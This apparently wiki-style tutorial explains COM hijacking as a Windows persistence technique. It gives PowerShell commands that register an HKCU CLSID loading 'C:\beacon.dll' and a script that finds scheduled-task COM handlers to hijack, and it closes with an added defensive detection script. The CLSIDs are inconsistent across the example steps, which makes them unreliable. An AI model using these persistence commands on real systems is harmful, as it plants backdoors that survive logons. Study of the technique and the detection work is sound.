COM Hijacking

Searching for non-existent COM components

Because the values under HKCU can be modified by the user, COM Hijacking can be used as a persistence mechanism. Using procmon, it is easy to find COM registry lookups for keys that do not exist, which an attacker could then create to persist. Filters:

  • RegOpenKey operations.

  • where Result is NAME NOT FOUND.

  • and Path ends with InprocServer32.

Once you have decided which non-existent COM component to impersonate, run the following commands. Be careful if you choose to impersonate a COM object that is loaded every few seconds, as that can generate a lot of noise.

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Hijackable Task Scheduler COM components

Windows Tasks use Custom Triggers to call COM objects, and because they run through the Task Scheduler, it is easier to predict when they will be executed.

# List the COM CLSIDs used as handlers by enabled scheduled tasks that run as the local Users group
$Tasks = Get-ScheduledTask

# Resolve the local Users group (well-known SID S-1-5-32-545) once, outside the loop
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

foreach ($Task in $Tasks)
{
    # Only tasks whose action is a COM handler have a ClassId
    if ($Task.Actions.ClassId -ne $null)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            # Compare the group name, not the LocalGroup object, so the match does not rely on implicit string conversion
            if ($Task.Principal.GroupId -eq $usersGroup.Name)
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}

# Example output:
# Task Name:  Example
# Task Path:  \Microsoft\Windows\Example\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more entries like the previous one...]

Looking at the output, you can pick one that is executed, for example, every time a user logs in.

Now search for the CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} in HKEY_CLASSES_ROOT\CLSID and in HKLM and HKCU; you will usually find that the value does not exist in HKCU.

# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

Then you only need to create the HKCU entry, and every time the user logs in your backdoor will be executed.
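
From the defender's side, the same precedence rule (HKCU wins over HKLM in the merged HKCR view) is what a hunt should key on. The following script is an added example, not code from the original page: it walks HKCU CLSIDs that carry an InprocServer32, flags those that shadow a machine-wide registration, point at a DLL outside the Windows directory or at a missing file, and cross-references them with scheduled-task COM handlers. The function name and output fields are my own.

```powershell
# Added detection script (not from the original page). Read-only: it inspects
# the registry and the task list and emits one object per suspicious CLSID.
function Find-ComHijackCandidates {
    # Map CLSID -> task path for every scheduled task whose action is a COM handler
    $taskClsids = @{}
    foreach ($t in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $t.Actions) {
            if ($a.ClassId) { $taskClsids[$a.ClassId.ToUpper()] = "$($t.TaskPath)$($t.TaskName)" }
        }
    }

    $userRoot = "HKCU:\Software\Classes\CLSID"
    foreach ($key in (Get-ChildItem -Path $userRoot -ErrorAction SilentlyContinue)) {
        $clsid  = $key.PSChildName.ToUpper()
        $inproc = Get-ItemProperty -Path "$($key.PSPath)\InprocServer32" -ErrorAction SilentlyContinue
        if (-not $inproc) { continue }   # only in-process servers load a DLL into the caller
        $userDll = $inproc.'(default)'

        # A per-user InprocServer32 for a CLSID that is also registered machine-wide
        # is the classic hijack shape; a CLSID only in HKCU matches the procmon case above.
        $machinePath = "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
        $machineDll  = (Get-ItemProperty -Path $machinePath -ErrorAction SilentlyContinue).'(default)'

        $reasons = @()
        if ($machineDll -and ($machineDll -ne $userDll)) { $reasons += "shadows HKLM server $machineDll" }
        if ($taskClsids.ContainsKey($clsid))             { $reasons += "used by task $($taskClsids[$clsid])" }
        if ($userDll -and ($userDll -notmatch '^[A-Za-z]:\\Windows\\')) { $reasons += "DLL outside %SystemRoot%" }
        if ($userDll -and -not (Test-Path -LiteralPath ([Environment]::ExpandEnvironmentVariables($userDll)))) {
            $reasons += "DLL not on disk (phantom registration)"
        }
        if ($reasons.Count -eq 0) { continue }

        [PSCustomObject]@{
            Clsid      = $clsid
            UserDll    = $userDll
            MachineDll = $machineDll
            Reasons    = ($reasons -join "; ")
        }
    }
}

Find-ComHijackCandidates | Format-Table -AutoSize
```

Expect legitimate per-user installs (for example under %LOCALAPPDATA%) to show up on the "outside %SystemRoot%" reason alone; the strong signals are a CLSID that shadows an HKLM server or that is the handler of a scheduled task.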
